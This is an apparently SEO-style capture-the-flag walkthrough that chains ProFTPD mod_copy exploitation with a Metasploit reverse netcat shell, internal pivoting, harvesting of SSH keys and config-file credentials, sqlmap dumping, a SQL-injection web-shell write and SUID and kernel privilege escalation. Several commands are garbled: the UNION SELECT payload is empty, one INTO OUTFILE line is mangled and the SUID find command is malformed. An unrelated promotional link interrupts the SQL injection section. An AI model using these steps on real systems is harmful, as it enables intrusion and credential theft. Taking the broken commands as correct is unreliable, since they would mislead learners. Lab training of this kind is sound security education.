Initial Access and the Path to System Compromise
Landing a cybersecurity role often means trading textbook theory for real-world pressure. The skills that matter most are the ones you prove under lab conditions, where every misconfigured service and unpatched daemon becomes a learning opportunity.
From chaining FTP vulnerabilities with web server execution to lateral movement and privilege escalation, these methods reflect the kind of layered thinking required in professional penetration testing. Whether you are preparing for certification exams or sharpening your red-team instincts, this exploitation ctf walkthrough will give you concrete, repeatable techniques to add to your toolkit.
Technique 1: ProFTPD mod_copy Exploitation (CVE-2015-3306)
The first technique targets a legacy FTP service running on the target host. During initial reconnaissance, a service scan revealed ProFTPD version 1.3.5, which has a well-documented vulnerability in its mod_copy module. This module allows the SITE CPFR and SITE CPTO commands, which copy files internally on the server. The flaw is that these commands require no authentication whatsoever.
Understanding the Vulnerability Mechanics
CVE-2015-3306 affects ProFTPD versions 1.3.5 and earlier. The mod_copy module was designed to let administrators duplicate files within the FTP filesystem. However, the developers omitted any authentication check before the copy operation executes. An unauthenticated attacker can connect to the FTP server and issue these commands directly.
The catch is that FTP servers cannot execute scripts. Copying a PHP file to /var/www/html does nothing by itself. The attack requires a co-hosted web server with script execution capability, typically Apache with PHP. Once the payload file lands in the web root, triggering it via an HTTP request hands execution responsibility to the web application engine.
Attack Chain Walkthrough
The chain proceeds in four stages: FTP file copy, web root placement, HTTP trigger, and remote code execution. First, confirm that the target runs both ProFTPD and Apache. A quick Nmap service scan with nmap -sV target1.ine.local will reveal both services if they are present.
Using SearchSploit, you can find ready-made exploit code for this exact version:
searchsploit proftpd 1.3.5
This returns multiple results, including the mod_copy exploit. The core requirement is that the ProFTPD service account has write access to the Apache document root, typically /var/www/html. If that condition holds, the attack becomes straightforward.
Automating with Metasploit
Metasploit includes a dedicated module for this vulnerability: exploit/unix/ftp/proftpd_modcopy_exec. After setting the remote host, local host, and site path, the module crafts a PHP payload, copies it via FTP to the web root, and triggers it over HTTP to establish a reverse shell.
The configuration looks like this:
set RHOSTS target1.ine.local
set LHOST 192.244.150.2
set SITEPATH /var/www/html
The default payload is cmd/unix/reverse_netcat, which opens a TCP connection back to the attacker on port 4444. When the module runs, it writes a PHP file such as kxVGG.php to the web root and sends an HTTP request to trigger it.
Handling Partial Failures
A common issue with this module is that Metasploit’s automated cleanup routine fails due to insufficient permissions on the web directory. The framework may display a “Failure executing payload” message and report that no session was created, even though the reverse shell is active. This happens because the cleanup attempt cannot delete the payload file, causing the module to abort prematurely.
The fix is simple: check your listener manually. The shell session is still there, waiting for interaction. Once you confirm the connection, you can proceed with post-exploitation tasks. This first technique gives you a foothold on the target, setting the stage for deeper enumeration.
Technique 2: Internal Service Discovery and Lateral Movement
After gaining initial access, the next challenge is identifying other services running on the internal network. The target host may have multiple network interfaces or trust relationships with adjacent systems. This phase of the exploitation ctf walkthrough focuses on discovering those hidden services and moving laterally.
Enumeration from the Foothold
Once you have a reverse shell, upgrade it to an interactive TTY. The Python one-liner python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ gives you job control and tab completion. From there, run ip addr or ifconfig to list all network interfaces. Look for additional IP ranges that the target can reach.
Next, scan the internal subnet using a lightweight tool like netcat or a compiled static binary of Nmap. Common internal ports to check include 22 (SSH), 80 (HTTP), 445 (SMB), 3306 (MySQL), and 5432 (PostgreSQL). Many CTF labs place a second target on an internal network that is not directly accessible from the attacker’s machine.
Pivoting Techniques
If you discover a second host on an internal subnet, you can pivot through the compromised machine. One approach is to set up a local port forward using SSH if the target has an SSH server running. Another method is to use Metasploit’s route add command to route traffic through the compromised session, allowing you to scan the internal host directly from your attack machine.
The key insight here is patience. Lateral movement often requires chaining multiple small discoveries. A database listening on an internal port might contain credentials that work on another service. A shared NFS mount might expose sensitive configuration files. Each finding expands your access.
Technique 3: SSH Key Abuse and Credential Harvesting
Once you have a shell on the compromised host, hunting for stored credentials becomes a priority. SSH keys are a frequent target because they often grant passwordless access to other systems. This technique focuses on locating and reusing those keys to move laterally.
Locating SSH Keys
Check the /home/ directory for user folders. Look inside ~/.ssh/ for files named id_rsa, id_ecdsa, or authorized_keys. If the private key is unprotected (no passphrase), you can use it directly to connect to other hosts. Even if the key is encrypted, you can attempt to crack it with John the Ripper or Hashcat.
Also check /root/.ssh/ if you have sudo access or if the root account is accessible. System administrators sometimes leave backup keys in unexpected locations like /backup/ or /opt/. A thorough search of the filesystem using find / -name “id_rsa” 2>/dev/null can reveal hidden treasures.
Credential Hunting in Configuration Files
Configuration files are another rich source. Check /etc/ for application configs, database connection strings, and web server settings. Files like wp-config.php (WordPress), config.inc.php (phpMyAdmin), or .env (Laravel) often contain database passwords. These credentials might be reused across services, including SSH.
If you find a database credential, try connecting to the local MySQL or PostgreSQL instance. Dump the user tables from applications like WordPress or Joomla. Password hashes can be cracked offline, and plaintext passwords stored in the database can be used directly for SSH logins on other hosts.
Technique 4: Web Application Exploitation via SQL Injection
Internal web applications are a common attack vector in CTF environments. After discovering a second host running Apache on an internal IP, the next step is to probe for web application vulnerabilities. SQL injection remains one of the most reliable techniques for extracting data and escalating access.
Identifying Injectable Parameters
Start by mapping the web application’s functionality. Look for URL parameters like id=, page=, user=, or product=. Submit a single quote (‘) and observe the response. A database error message, a blank page, or unexpected behavior indicates a potential injection point.
Use a tool like sqlmap to automate detection and exploitation. Point it at the vulnerable URL with a command like:
You may also enjoy reading: Virginia Tech vs UVA: Smithfield Commonwealth Clash Preview and Key Stats.
sqlmap -u “http://internal-host/index.php?id=1” –batch –dump
Sqlmap will test various injection techniques, enumerate the database structure, and extract table contents. In a CTF scenario, the flag or credentials for the next stage are often stored in a database table.
From SQLi to Remote Code Execution
Some database configurations allow writing files to the filesystem. If the database user has FILE privileges, you can use SELECT. INTO OUTFILE to write a web shell to the document root. This converts a SQL injection vulnerability into full remote code execution.
For MySQL, the command looks like this:
‘ UNION SELECT “” INTO OUTFILE “/var/www/html/shell.php” — –
Once the shell file is written, accessing http://internal-host/shell.php?cmd=id executes the command and returns the output. This technique bridges the gap between database access and system-level control, enabling further lateral movement or privilege escalation.
Technique 5: Privilege Escalation via SUID Binaries and Kernel Exploits
The final technique in this exploitation ctf walkthrough focuses on elevating privileges from a low-privilege user to root. After compromising a web application or gaining access via SSH keys, you will likely land as a non-root user. Escalating to root requires careful enumeration of the target system.
Finding SUID and SGID Binaries
SUID (Set User ID) binaries run with the permissions of their owner, typically root. A misconfigured SUID binary can allow a standard user to execute commands with elevated privileges. The classic command to find them is:
find / -perm -4000 -type f 2>/dev/null
Look for unusual entries like nmap, vim, find, bash, or custom scripts. Each of these can be abused to gain a root shell. For example, if find has the SUID bit set, you can run:
find / -exec whoami;
If the output shows “root,” you have immediate privilege escalation. Similarly, SUID nmap allows interactive mode with elevated privileges, and SUID vim lets you spawn a shell from within the editor.
Kernel Exploit Assessment
If no misconfigured binaries are available, check the kernel version. Use uname -a to see the release. Older kernels, such as those from Ubuntu 14.04 or CentOS 6, have known privilege escalation exploits. Tools like linux-exploit-suggester.sh can automate the identification of applicable CVEs.
Common kernel exploits include CVE-2016-5195 (Dirty Cow), CVE-2021-4034 (PwnKit), and CVE-2023-2640 (a recent Ubuntu overlayfs bug). Each of these has ready-made exploit code available on Exploit-DB or GitHub. Compile the exploit on the target system or transfer a pre-compiled binary, then execute it to gain a root shell.
Post-Escalation Steps
Once you have root access, capture the final flag. In the context of the CTF described earlier, Flag 1 was stored at /root/flag1.txt. After privilege escalation, you can read it directly. Document the entire chain of techniques used, as this record becomes invaluable for reporting and for your own professional growth.
Bringing It All Together
This exploitation ctf walkthrough covered five techniques that span the full attack lifecycle: initial compromise via ProFTPD mod_copy, internal service discovery for lateral movement, SSH key and credential harvesting, web application exploitation through SQL injection, and privilege escalation via SUID binaries or kernel exploits. Each technique builds on the previous one, creating a complete picture of how a real penetration test unfolds.
The most important takeaway is that no single technique guarantees success. The art of exploitation lies in chaining multiple small advantages. A misconfigured FTP server leads to a shell. That shell reveals an internal host. That host stores SSH keys. Those keys unlock a database. That database enables code execution. And that execution grants root access. Every step depends on thorough enumeration and a willingness to adapt when automated tools fail.
Approach each lab with curiosity and methodical patience. The skills you build here transfer directly to real-world engagements, where the same patterns of misconfiguration and trust abuse appear again and again.
